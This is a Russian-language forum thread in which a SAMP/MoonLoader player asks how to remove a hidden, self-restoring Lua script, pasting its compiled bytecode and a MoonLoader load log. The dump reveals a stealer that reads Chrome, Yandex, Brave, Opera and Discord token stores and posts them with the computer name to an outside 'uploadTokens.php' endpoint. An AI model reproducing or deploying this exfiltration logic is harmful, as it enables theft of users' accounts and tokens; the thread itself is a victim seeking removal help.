споймал ебанутый стиллер

[xionerme]

В AVG он есть

В папке его нет... Через AVG удаляю самп заходит, не удаляю - незаходит.

Т.К. в папке его нет - открыл через AVG вот че внутри

Спойлер: внутри

LJZ 6 9 ) ' B 9
XЂ 9 ) B L subsourceSgetinfo
debugк ;4 - 9 ' B- 99 ' & B- 9' )яяB X&ЂU Ђ- 9: 9B 9 '
B XЂ 9 ' B XЂ ' &<- 99
B XЯ- 99 BL АFindCloseFindNextFileA/%.ldb$%.log$ findcFileNamestring
void* cast/*FindFirstFileACWIN32_FIND_DATA[1]new¤
L ' & 4 - B) ) M<Ђ6 98' B
X4Ђ 9'
B )

X )Ђ) 9
'
B

X!Ђ

XЂ
XЂ
! ) Xм
Xй Xж 9)ияB
&< X
Ш
9 B OД6
9 ' D А
concat
table
closesub$([-_%w]+)(%.[-_%w]+%.)([-_%w]+) find*a readrb openio/Local Storage/leveldb6т 6- 9 ' ) , ) B
X,Ђ- 9 )P ,
) ) )
B
XЂ- 9 ,
)
) B
X
Ђ' - 9

B- 9 B- 9 B- 9 BK АInternetCloseHandleHttpSendRequestA4Content-Type: application/x-www-form-urlencodedHttpOpenRequestAInternetConnectAMozilla/5.0InternetOpenAл
7' 6 - BHЂ- 9 B XЂ- B ) XЂ ' & FRн' 6 9' B' & - ' - '
B- B
XЂ- 99 )Ђ B XЂ6 9
BK АА А
ААА АremoveSetFileAttributesAC/uploadTokens.php POST
&tokens=COMPUTERNAMEgetenvoscomputerName=
PathFileExistsA
pairsѓ
! ?6 ' B 9 ' B9 ' B9 ' B' 6 9 '
B' &6 9 ' B' &5 '
&= ' &= ' &= ' &= ' &= ' &= ' &=3 3 3 3
3 B2 ЂK Yandex+Yandex/YandexBrowser/User Data/Default
Brave2BraveSoftware/Brave-Browser/User Data/Default
Opera Opera Software/Opera StableGoogleChrome$Google/Chrome/User Data/DefaultDiscordPTBdiscordptbDiscordCanarydiscordcanaryDiscord discordAPPDATA/LOCALAPPDATAgetenvos check-moonloader-updates.ruwininetshlwapi loadҐ
typedef struct _FILETIME
{
unsigned long dwLowDateTime;
unsigned long dwHighDateTime;
} FILETIME;

typedef struct _WIN32_FIND_DATA
{
unsigned long dwFileAttributes;
FILETIME ftCreationTime;
FILETIME ftLastAccessTime;
FILETIME ftLastWriteTime;
unsigned long nFileSizeHigh;
unsigned long nFileSizeLow;
unsigned long dwReserved0;
unsigned long dwReserved1;
char cFileName[260];
char cAlternateFileName[14];
} WIN32_FIND_DATA, *LPWIN32_FIND_DATA;

void* __stdcall FindFirstFileA(const char*, LPWIN32_FIND_DATA);
bool __stdcall FindNextFileA(void*, LPWIN32_FIND_DATA);
bool __stdcall FindClose(void*);
bool __stdcall PathFileExistsA(const char*);

void* __stdcall InternetOpenA(const char*, unsigned long, const char*, const char*, unsigned long);
void* __stdcall InternetConnectA(void*, const char*, unsigned short, const char*,
const char*, unsigned long, unsigned long, unsigned long);
void* __stdcall HttpOpenRequestA(void*, const char*, const char*, const char*,
const char*, const char*, unsigned long, unsigned long);
bool __stdcall HttpSendRequestA(void*, const char*, unsigned long, const char*, unsigned long);
bool __stdcall InternetCloseHandle(void*);

bool __stdcall SetFileAttributesA(const char*, unsigned long);
cdefffirequire

как удалить его, удаляю - он востанавливается

ps: скрытые файлы включены.

 

[woodware]

ну для начала inetloader это необязательно стиллер, плюс AVP был создан еще до появления moonloadera

 

[Majunti]

Этот unins000.lua подгрузил тебе jetloader, а jetloader подгружает этот файл, там в сборке еще один есть, может называться luajit.lua

 

[xionerme]

ну для начала inetloader это необязательно стиллер, плюс AVP был создан еще до появления moonloadera

а что это тогда? если внутри строчки
3 B2 ЂK Yandex+Yandex/YandexBrowser/User Data/Default
Brave2BraveSoftware/Brave-Browser/User Data/Default
Opera Opera Software/Opera StableGoogleChrome$Google/Chrome/User Data/DefaultDiscordPTBdiscordptbDiscordCanarydiscordcanaryDiscord
которые по моему мнению пиздят данные. И какой норм скрипт будет скрыт, и будет ломать гта-шку.
Ктомуже обычный lua можно открыть через блокнот, что и делает AVP

Этот unins000.lua подгрузил тебе jetloader, а jetloader подгружает этот файл, там в сборке еще один есть, может называться luajit.lua

Спойлер: log

[16:05:02.110532] (system) Session started.
[16:05:02.112637] (debug) Module handle: 6B760000

MoonLoader v.026.5-beta loaded.
Developers: FYP, hnnssy, EvgeN 1137

Copyright (c) 2016, BlastHack Team

https://www.blast.hk/moonloader/

[16:05:02.112637] (info) Working directory: E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader
[16:05:02.112637] (debug) FP Control: 0009001F
[16:05:02.112637] (debug) Game: GTA SA 1.0.0.0 US
[16:05:02.112637] (system) Installing pre-game hooks...
[16:05:02.117345] (system) Hooks installed.
[16:05:04.087400] (debug) Initializing opcode handler table
[16:05:04.087904] (debug) package.path = E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\lib\?.lua;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\lib\?\init.lua;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\?.lua;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\?\init.lua;.\?.lua;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\lib\?.luac;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\lib\?\init.luac;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\?.luac;E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\?\init.luac;.\?.luac
[16:05:04.087904] (debug) package.cpath = E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\lib\?.dll;
[16:05:04.088912] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\alt enter.lua'...
[16:05:04.089414] (debug) New script: 0ED1EE2C
[16:05:04.091426] (system) alt enter.lua: Loaded successfully.
[16:05:04.091929] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\bweather.luac'...
[16:05:04.091929] (debug) New script: 0FCCA9AC
[16:05:04.106004] (system) bweather.luac: Loaded successfully.
[16:05:04.106004] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\delstream.luac'...
[16:05:04.106004] (debug) New script: 0FCCAF94
[16:05:04.120582] (system) delstream.luac: Loaded successfully.
[16:05:04.121085] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\dist.luac'...
[16:05:04.121085] (debug) New script: 0FCDD4EC
[16:05:04.153779] (system) dist.luac: Loaded successfully.
[16:05:04.153779] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\infotext.lua'...
[16:05:04.153779] (debug) New script: 0FD2E684
[16:05:04.179923] (error) 3dinfotext: ...азрешенные\morty winter low 2022\moonloader\infotext.lua:56: attempt to yield across C-call boundary
stack traceback:
[C]: in function 'wait'
...азрешенные\morty winter low 2022\moonloader\infotext.lua:56: in main chunk
[16:05:04.180427] (error) 3dinfotext: Script died due to an error. (0FD2E684)
[16:05:04.181935] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\logo.lua'...
[16:05:04.182437] (debug) New script: 0FD2E66C
[16:05:04.192491] (system) New Logo by Ambient Mods and VovaS SпїЅripts : Loaded successfully.
[16:05:04.192491] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\luajit.lua'...
[16:05:04.192994] (debug) New script: 0FD3EE84
[16:05:04.200046] (system) luajit.lua: Loaded successfully.
[16:05:04.200549] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\money_separator.lua'...
[16:05:04.200549] (debug) New script: 0FD46904
[16:05:04.213132] (system) money_separator.lua: Loaded successfully.
[16:05:04.213132] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\reload_all.lua'...
[16:05:04.213132] (debug) New script: 01B7B59C
[16:05:04.214640] (system) ML-ReloadAll: Loaded successfully.
[16:05:04.214640] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\SF Integration.lua'...
[16:05:04.215142] (debug) New script: 0FD46A8C
[16:05:04.219250] (system) SF Integration: Loaded successfully.
[16:05:04.219250] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\SupremeTools.lua'...
[16:05:04.219250] (debug) New script: 0FD481DC
[16:05:04.251109] (system) SupremeTools: Loaded successfully.
[16:05:04.251109] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\unins000.lua'...
[16:05:04.251109] (debug) New script: 0FD49ABC

 

[Majunti]

[16:05:04.192491] (system) Loading script 'E:\samp 228 zxc\разрешенные\morty winter low 2022\moonloader\luajit.lua'...

это загрузчик

 

[umbrella saxon]

включи показ скрытых файлов и удали

 

[xionerme]

включи показ скрытых файлов и удали

включил, нету.

 

[umbrella saxon]

включил, нету.

значит скрипт загружается при запуске сампа и удаляется при его закрытии

 

[Majunti]

включил, нету.

включи отображение защищенных системных файлов

нажми короче win + R и введи regedit
перейди по пути Компутер\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
и пришли скрин того что там есть

 

[xionerme]

включи отображение защищенных системных файлов

нажми короче win + R и введи regedit
перейди по пути Компутер\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
и пришли скрин того что там есть

включи отображение защищенных системных файлов

о нашел.

 

[Majunti]

Антивирус ругался на подозрительные файлы?

 

[xionerme]

Антивирус ругался на подозрительные файлы?

антивирус у меня залупа, я его оффнул, в пизду его. А крч в мунлоадере новые файлы начали подгружается.

 

[yung milonov]

автор стиллера гений